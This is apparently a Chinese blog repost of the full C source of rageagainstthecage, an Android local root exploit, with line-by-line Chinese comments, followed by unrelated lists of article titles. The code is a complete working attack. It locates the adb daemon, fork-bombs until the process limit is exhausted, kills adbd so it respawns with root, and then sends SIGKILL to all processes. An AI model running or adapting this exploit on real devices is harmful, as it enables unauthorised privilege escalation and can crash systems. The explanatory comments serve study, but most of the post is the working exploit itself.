如下:

//头文件包含

#include <stdio.h>

#include <sys/types.h>

#include <sys/time.h>

#include <sys/resource.h>

#include <unistd.h>

#include <fcntl.h>

#include <errno.h>

#include <string.h>

#include <signal.h>

#include <stdlib.h> 

//输出错误消息后退出程序

void die(const char *msg)

{

    perror(msg);

    exit(errno);

} 

//搜索ADB进程,返回其PID,没有找到时返回0

pid_t find_adb()

{

    char buf[256];

    int i = 0, fd = 0;

    pid_t found = 0;    //初始化为0,如果没有找到adb将一直保持0值 

    //遍历进程ID的有效范围

    for (i = 0; i < 32000; ++i)

    {

        //拼接字符串"/proc/<PID>/cmdline"

        sprintf(buf, "/proc/%d/cmdline", i); 

        //打开失败,进程不存在或无权访问

        if ((fd = open(buf, O_RDONLY)) < 0)

        {

            //跳过这个PID,继续下一轮循环

            continue;

        }   //end if 

        //buf填0

        memset(buf, 0, sizeof(buf)); 

        //读取进程的命令行

        read(fd, buf, sizeof(buf) - 1); 

        //关闭进程

        close(fd); 

        //在命令行中查找"/sbin/adb"

        if (strstr(buf, "/sbin/adb"))

        {

            //找到了"/sbin/adb"则说明找到了adb进程,返回找到的PID

            found = i;

            break;

        }   //end if

    }   //end for 

    //返回找到的PID或0值

    return found;

} 

//重启adb进程,参数为当前adb进程的PID

void restart_adb(pid_t pid)

{

    //直接杀死进程(sig = SIGKILL)

    kill(pid, 9);

} 

//等待具有root权限的adb进程

//参数为原有adb进程的PID

void wait_for_root_adb(pid_t old_adb)

{

    pid_t p = 0; 

    //死循环,只能由里面的break跳出

    for (;;)

    {

        //搜索adb进程

        p = find_adb(); 

        //找到了adb进程,并且不是原来那个旧的adb进程

        if (p != 0 && p != old_adb)

        {

            //退出循环

            break;

        } 

        //休息1秒,防止大量占用CPU

        sleep(1); 

    }   //end for 

    //休息5秒,等待新的adb进程初始化完毕

    sleep(5); 

    //将SIGKILL广播给系统中的所有进程

    kill(-1, 9);

} 

//程序入口点

int main(int argc, char **argv)

{

    pid_t adb_pid = 0, p;

    int pids = 0, new_pids = 1;

    int pepe[2];

    char c = 0;

    struct rlimit rl; 

    //启动时显示的版本与版权信息

    printf(" CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n");

    printf(" checking NPROC limit ...\n"); 

    //获取当前进程可以创建的最大子进程数量

    if (getrlimit(RLIMIT_NPROC, &rl) < 0)

    {

        //失败时输出消息退出

        die("[-] getrlimit");

    } 

    //检查是否有最大子进程数量限制

    if (rl.rlim_cur == RLIM_INFINITY)

    {

        //当没有最大子进程数量限制时,不执行exploit,否则将导致系统崩溃

        printf("[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n");

        exit(1);

    } 

    //输出最大子进程数量软性限制和硬性限制

    printf("[+] RLIMIT_NPROC={%lu, %lu}\n", rl.rlim_cur, rl.rlim_max);

    printf(" Searching for adb ...\n"); 

    //查找adb进程

    adb_pid = find_adb(); 

    //检查是否找到了adb进程

    if (!adb_pid)

    {

        //没有找到时直接退出

        die("[-] Cannot find adb");

    } 

    //输出adb进程的PID

    printf("[+] Found adb as PID %d\n", adb_pid); 

    //输出一大堆废话

    printf(" Spawning children. Dont type anything and wait for reset!\n");

    printf("\n If you like what we are doing you can send us PayPal money to\n"

           " 7-4-3-C@web.de so we can compensate time, effort and HW costs.\n"

           " If you are a company and feel like you profit from our work,\n"

           " we also accept donations > 1000 USD!\n");

    printf("\n adb connection will be reset. restart adb server on desktop and re-login.\n"); 

    //休息5秒,防止当前的adb进程没有完全初始化

    sleep(5); 

    //如果在父进程中(已有子进程)

    if (fork() > 0)

    {

        //退出

        exit(0);

    } 

    //创建一个新的进程组

    setsid(); 

    //创建管道

    pipe(pepe); 

    //如果在子进程中

    if (fork() == 0)

    {

        //关闭输入管道

        close(pepe[0]); 

        //死循环,直到满足条件时退出进程

        for (;;)

        {

            //如果是子进程

            if ((p = fork()) == 0)

            {

                //直接退出

                exit(0);

            }

            else if (p < 0)     //创建进程失败,说明已达到进程数最大值

            {

                //确保代码只执行一次,防止多个进程反复输出信息

                if (new_pids)

                {

                    printf("\n[+] Forked %d childs.\n", pids);

                    new_pids = 0;

                    //在输出管道中写入一个字节,然后关闭管道

                    //相当于通知顶级父进程fork炸弹完成

                    write(pepe[1], &c, 1);

                    close(pepe[1]);

                }

            }

            else

            {

                //进程总数+1

                ++pids;

            }

        }

    } 

    //关闭输出管道

    close(pepe[1]); 

    //从输入管道中读一个字符,用来等待前面创建的子进程到达最大值

    read(pepe[0], &c, 1); 

    //重启adb

    restart_adb(adb_pid); 

    //在adb重启完以前,再创建一个子进程,占用刚释放出的进程空位

    if (fork() == 0)

    {

        //子进程里继续开子进程,保证进程空位被占满

        fork(); 

        //无限休眠,永不退出

        for (;;)

        {

            sleep(0x743C);

        }

    } 

    //等待具有root权限的adb启动

    wait_for_root_adb(adb_pid); 

    //执行完毕

    return 0;

}

  转自:http://blog.sina.com.cn/s/blog_405bf2e501011ic7.html

【转载】rageagainstthecage.c源码以及注释的更多相关文章

  1. robotlegs2.0框架实例源码带注释

    robotlegs2.0框架实例源码带注释 Robotlegs2的Starling扩展 有个老外写了robotleges2的starling扩展,地址是 https://github.com/brea ...

  2. eclipse/intellij idea 查看java源码和注释

    工作三年了,一直不知道怎么用IDE查看第三方jar包的源码和注释,惭愧啊!看源码还好些,itellij idea自带反编译器,eclipse装个插件即可,看注释就麻烦了,总不能去找api文档吧!现在终 ...

  3. 【Eclipse+IntelliJ反编译】Eclipse/IntelliJ IDEA反编译查看源码及注释

    怎么用IDE查看第三方jar包的源码和注释,IntelliJ IDEA自带反编译器,Eclipse装个插件即可,不能看注释就麻烦了,总不能去找API文档吧,现在终于掌握了,下面给出解决方案,供大家参考 ...

  4. ExcelToHtmlTable转换算法:将Excel转换成Html表格并展示(项目源码+详细注释+项目截图)

    功能概述 Excel2HtmlTable的主要功能就是把Excel的内容以表格的方式,展现在页面中.Excel的多个Sheet对应页面的多个Tab选项卡.转换算法的难点在于,如何处理行列合并,将Exc ...

  5. Mybatis3源码加注释后后编译问题

    参考:https://mp.weixin.qq.com/s/v0ihaPsuyGufdc_ImEqX8A给mybatis3源码加注释并编译源代码 编译命令: mvn clean mvn install ...

  6. [转载]JMeter源码导入Eclipse

    转载自:http://www.cnblogs.com/taoSir/p/5144274.html 由于JMeter纯Java开发,界面也是基于Swing或AWT搞出来的,所以想更深层次的去了解这款工具 ...

  7. [转载]《STL源码剖析》阅读笔记之 迭代器及traits编程技法

    本文从三方面总结迭代器   迭代器的思想   迭代器相应型别及traits思想   __type_traits思想 一 迭代器思想 迭代器的主要思想源于迭代器模式,其定义如下:提供一种方法,使之能够依 ...

  8. vue源码逐行注释分析+40多m的vue源码程序流程图思维导图 (diff部分待后续更新)

    vue源码业余时间差不多看了一年,以前在网上找帖子,发现很多帖子很零散,都是一部分一部分说,断章的很多,所以自己下定决定一行行看,经过自己坚持与努力,现在基本看完了,差ddf那部分,因为考虑到自己要换 ...

  9. 使用C#重写网上的60行 Javascript 俄罗斯方块源码 (带注释)

    在很久很久以前,就已经看过 60行Js的俄罗斯方块源码.无奈当时能力不够看明白,当时觉得就是个神作. 现在总算有空再看了,顺便用c#实现一遍(超过60行),顺道熟悉下Js API. 网上其他博客也有分 ...

随机推荐

  1. python 工具 二进制文件处理之——去掉指定长度数据包头

    包头48bit 数据98464 ...如此循环: piece_size = 48 piece_size1 = 98464 with open("C:\\Users\\Administrato ...

  2. 反射 type 的基本用法,动态加载插件

    这里介绍反射的简单实用 MyClass类 public class MyClass { public int Age { get; set; } public string Name { get; s ...

  3. SQL_字符操作函数

    原创作品.出自 "深蓝的blog" 博客.欢迎转载,转载时请务必注明下面出处,否则追究版权法律责任. 深蓝的blog:http://blog.csdn.net/huangyanlo ...

  4. Kick the ball!(dfs)湖南省赛第十届

    Problem K: Kick the ball! Time Limit: 1 Sec  Memory Limit: 128 MB  Special Judge Submit: 109  Solved ...

  5. 利用泛型和反射,管理配置文件,把Model转换成数据行,并把数据行转换成Model

    利用泛型和反射,管理配置文件,把Model转换成数据行,并把数据行转换成Model   使用场景:网站配置项目,为了便于管理,网站有几个Model类来管理配置文件, 比如ConfigWebsiteMo ...

  6. java arraylist源码记录

    1. ArrayList 实现了RandomAccess接口, RandomAccess接口用于标记是否可以随机访问 2. 继承了AbstractList类, 因此获取了modcount , modc ...

  7. 使用 sigaction 函数实现可靠信号

    前言 在前文中,讲述了一个可靠信号的示例.它分成几个步骤组成( 请参考前文 ).在 Linux 系统编程中,有个方法可以将这些步骤给集成起来,让我们使用起来更加的方便.那就是调用 sigaction ...

  8. 解决Android Studio下Element layer-list must be declared问题

    近期将一个项目从Eclipse转到Android Studio. 项目中使用了环信demo中的一些xml资源,转换后发现color资源目录下诸如layer-list或者shape等标签报Element ...

  9. Storage,Memcache,KVDB都是存储服务,如何区分何时用何种服务

    Storage :是SAE为开发者提供的分布式文件存储服务,用来存放用户的持久化存储的文件.用户需要先在在线管理平台创建Domain(相当于一级子目录).    Storage为开发者提供分布式文件存 ...

  10. LeetCode算法题目解答汇总(转自四火的唠叨)

    LeetCode算法题目解答汇总 本文转自<四火的唠叨> 只要不是特别忙或者特别不方便,最近一直保持着每天做几道算法题的规律,到后来随着难度的增加,每天做的题目越来越少.我的初衷就是练习, ...